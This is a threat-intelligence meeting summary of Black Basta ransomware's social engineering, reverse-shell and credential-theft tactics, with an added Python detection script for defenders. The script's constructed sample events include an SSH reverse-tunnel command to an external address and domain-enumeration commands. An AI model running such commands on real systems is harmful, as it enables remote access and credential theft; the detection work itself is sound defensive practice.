December 9, 2024 at 01:18PM
Black Basta ransomware operators have been changing tactics since October 2024, combining social engineering with payloads such as Zbot and DarkGate. The group floods targets with email, impersonates IT staff on Microsoft Teams, and sends malicious QR codes. Once on a host, the goal is credential harvesting, including theft of VPN configuration files, to enable further intrusions.
### Meeting Takeaways: Dec 09, 2024 – Threat Intelligence / Malware
**Black Basta Ransomware Update:**
– **Tactics Change:** Black Basta ransomware actors are experimenting with new social engineering techniques and using payloads like Zbot and DarkGate since October 2024.
– **Email Bombing:** Targets are bombarded with emails by signing them up for multiple mailing lists before the threat actor makes contact.
**Initial Contact Methods:**
– **Microsoft Teams Interactions:** Attackers impersonate IT staff or support personnel on Microsoft Teams to initiate contact.
– **Remote Access Software Use:** Victims are talked into installing legitimate remote access software (e.g., AnyDesk, TeamViewer); the resulting interactive session is what the attackers use to deploy further malicious payloads.
**Technical Approach:**
– **Reverse Shell and QR Codes:** The actors attempt to use the OpenSSH client to establish a reverse shell back to their infrastructure; separately, they send malicious QR codes during the Teams conversation to lure victims into entering credentials.
– **Credential Harvesting:** Once on the host, the operators quickly enumerate the environment and exfiltrate credentials, including VPN configuration files that give them a route back into the network.
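The three host-observable steps above (the email flood, the remote access tool install, the `ssh -R` reverse tunnel followed by quick enumeration) translate into simple detections. The following is an added example, not code from the original briefing or from any vendor report: it runs toy detectors over constructed sample events. The event field names (`ts`, `user`, `image`, `cmdline`, `parent`), the usernames, paths and addresses are all assumptions made for illustration, not a real SIEM schema. The QR-code lure is not covered, since it is scanned on a phone and leaves nothing in host logs.

```python
"""Added example, not from the original briefing: toy detections for the chain above,
run over constructed sample events. Field names (ts, user, image, cmdline, parent)
are assumptions, not a real SIEM schema."""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath
import shlex

T0 = datetime(2024, 12, 9, 9, 0, 0)
# Constructed mail-gateway events: (timestamp, recipient, sender domain).
MAIL_EVENTS = [(T0 + timedelta(seconds=20 * i), "j.doe@example.com", f"list{i}.example.net")
               for i in range(25)]
MAIL_EVENTS += [(T0 + timedelta(minutes=m), "a.smith@example.com", "partner.example.org")
                for m in (1, 30, 55)]

def _ev(offset, user, image, cmdline, parent):
    return {"ts": T0 + offset, "user": user, "image": image, "cmdline": cmdline, "parent": parent}

J, A, S32 = "CORP\\jdoe", "CORP\\asmith", r"C:\Windows\System32"
# Constructed Sysmon-style process events: jdoe is the victim, asmith is a benign control.
PROC_EVENTS = [
    _ev(timedelta(minutes=40), J, r"C:\Users\jdoe\Downloads\AnyDesk.exe",
        r'"C:\Users\jdoe\Downloads\AnyDesk.exe"', r"C:\Program Files\WindowsApps\MSTeams_24\ms-teams.exe"),
    _ev(timedelta(minutes=41), J, S32 + r"\OpenSSH\ssh.exe",
        "ssh.exe -N -R 2222:127.0.0.1:22 op@203.0.113.10", S32 + r"\cmd.exe"),
    _ev(timedelta(minutes=42), J, S32 + r"\whoami.exe", "whoami /all", S32 + r"\cmd.exe"),
    _ev(timedelta(minutes=42, seconds=10), J, S32 + r"\nltest.exe", "nltest /dclist:corp", S32 + r"\cmd.exe"),
    _ev(timedelta(minutes=42, seconds=25), J, S32 + r"\net.exe", 'net group "Domain Admins" /domain', S32 + r"\cmd.exe"),
    _ev(timedelta(hours=2), A, r"C:\Program Files\TeamViewer\TeamViewer.exe",
        r'"C:\Program Files\TeamViewer\TeamViewer.exe"', r"C:\Windows\explorer.exe"),
    _ev(timedelta(hours=2, minutes=5), A, S32 + r"\OpenSSH\ssh.exe",
        "ssh.exe -L 8080:intranet.example.com:80 asmith@bastion.example.com", S32 + r"\WindowsTerminal.exe"),
]
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "teamviewer.exe"}  # the tools named in the briefing
CHAT_OR_BROWSER = {"ms-teams.exe", "teams.exe", "msedge.exe", "chrome.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")
DISCOVERY_TOOLS = {"whoami.exe", "nltest.exe", "net.exe", "net1.exe", "ipconfig.exe"}

def _burst(pairs, window, min_items, min_distinct):
    """True if some `window` of (ts, value) pairs holds >= min_items entries with
    >= min_distinct distinct values. Quadratic, which is fine for a sketch."""
    pairs = sorted(pairs)
    for i, (t0, _) in enumerate(pairs):
        chunk = [v for t, v in pairs[i:] if t - t0 <= window]
        if len(chunk) >= min_items and len(set(chunk)) >= min_distinct:
            return True
    return False

def detect_email_bombing(events, window=timedelta(minutes=10), threshold=20, distinct_min=10):
    """Recipients flooded by >= threshold messages from >= distinct_min sender domains
    inside `window`: a mailing-list sign-up flood is many unrelated senders at once."""
    by_rcpt = defaultdict(list)
    for ts, rcpt, domain in events:
        by_rcpt[rcpt].append((ts, domain))
    return {r for r, m in by_rcpt.items() if _burst(m, window, threshold, distinct_min)}

def detect_remote_access_tool(ev):
    """Flag AnyDesk/TeamViewer started from a user-writable path or by a chat/browser
    client: the 'install this so IT can help you' step, not a helpdesk deployment."""
    name = ntpath.basename(ev["image"]).lower()
    if name not in REMOTE_ACCESS_TOOLS:
        return None
    parent = ntpath.basename(ev["parent"]).lower()
    if parent in CHAT_OR_BROWSER or any(p in ev["image"].lower() for p in USER_WRITABLE):
        return f"remote access tool {name} from {ev['image']} (parent {parent})"
    return None

def detect_ssh_reverse_tunnel(ev):
    """Flag ssh.exe with -R (remote port forward) or RemoteForward: the OpenSSH client
    becoming a reverse tunnel to the operator. Handles bundled options such as -fNR."""
    if ntpath.basename(ev["image"]).lower() != "ssh.exe":
        return None
    if "remoteforward" in ev["cmdline"].lower():
        return f"ssh reverse tunnel: {ev['cmdline']}"
    try:
        argv = shlex.split(ev["cmdline"], posix=False)
    except ValueError:  # unbalanced quotes in an attacker-controlled command line
        argv = ev["cmdline"].split()
    if any(t.startswith("-") and not t.startswith("--") and "R" in t[1:] for t in argv[1:]):
        return f"ssh reverse tunnel: {ev['cmdline']}"
    return None

def detect_discovery_burst(events, window=timedelta(minutes=2), min_cmds=3):
    """Users running >= min_cmds distinct discovery tools inside `window`: the quick
    enumeration that precedes credential and VPN-config theft."""
    by_user = defaultdict(list)
    for ev in events:
        name = ntpath.basename(ev["image"]).lower()
        if name in DISCOVERY_TOOLS:
            by_user[ev["user"]].append((ev["ts"], name))
    return {u for u, r in by_user.items() if _burst(r, window, min_cmds, min_cmds)}

def run_detections(mail_events=MAIL_EVENTS, proc_events=PROC_EVENTS):
    """Run every detector and return the alert strings for the sample data."""
    alerts = [f"email bombing against {r}" for r in sorted(detect_email_bombing(mail_events))]
    for ev in proc_events:
        for hit in (detect_remote_access_tool(ev), detect_ssh_reverse_tunnel(ev)):
            if hit:
                alerts.append(f"{ev['ts']:%H:%M:%S} {ev['user']}: {hit}")
    alerts += [f"discovery burst by {u}" for u in sorted(detect_discovery_burst(proc_events))]
    return alerts
```

On the sample data `run_detections()` yields four alerts, all for the victim account: the mailing-list flood, AnyDesk launched from Downloads by the Teams client, `ssh.exe -R` to an external address, and three discovery commands inside two minutes. The helpdesk-installed TeamViewer under Program Files and the `-L` local forward are left alone. The thresholds are starting points to tune per environment; the value of these rules comes from correlating them on one user within an hour, which is the sequence the briefing describes.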
**Black Basta Evolution:**
– **Origin:** Emerged as an independent group after the shutdown of Conti in 2022; its initial access has since shifted from QakBot-delivered infections to the social engineering described above.
– **Malware Variants:** Utilizes various bespoke malware families including KNOTWRAP, KNOTROCK, DAWNCRY, PORTYARD, and COGSCAN for its operations.
**Broader Cybersecurity Context:**
– **Ransomware Variants:** Other ransomware groups, including Akira and Rhysida, are also evolving their tactics. Rhysida is using typosquatted domains and SEO poisoning to trick users into downloads of infected software disguised as legitimate applications.
**Next Steps:**
– **Enhanced Awareness:** Continuous monitoring of evolving threats and adapting security measures accordingly.
– **User Education:** Inform users about the risks of interacting with unknown contacts, especially in corporate environments.
### Follow-Up Actions:
– Stay updated with the latest threat intelligence reports.
– Review and bolster email security protocols to defend against email bombing.
– Educate teams on identifying phishing tactics and secure remote access practices.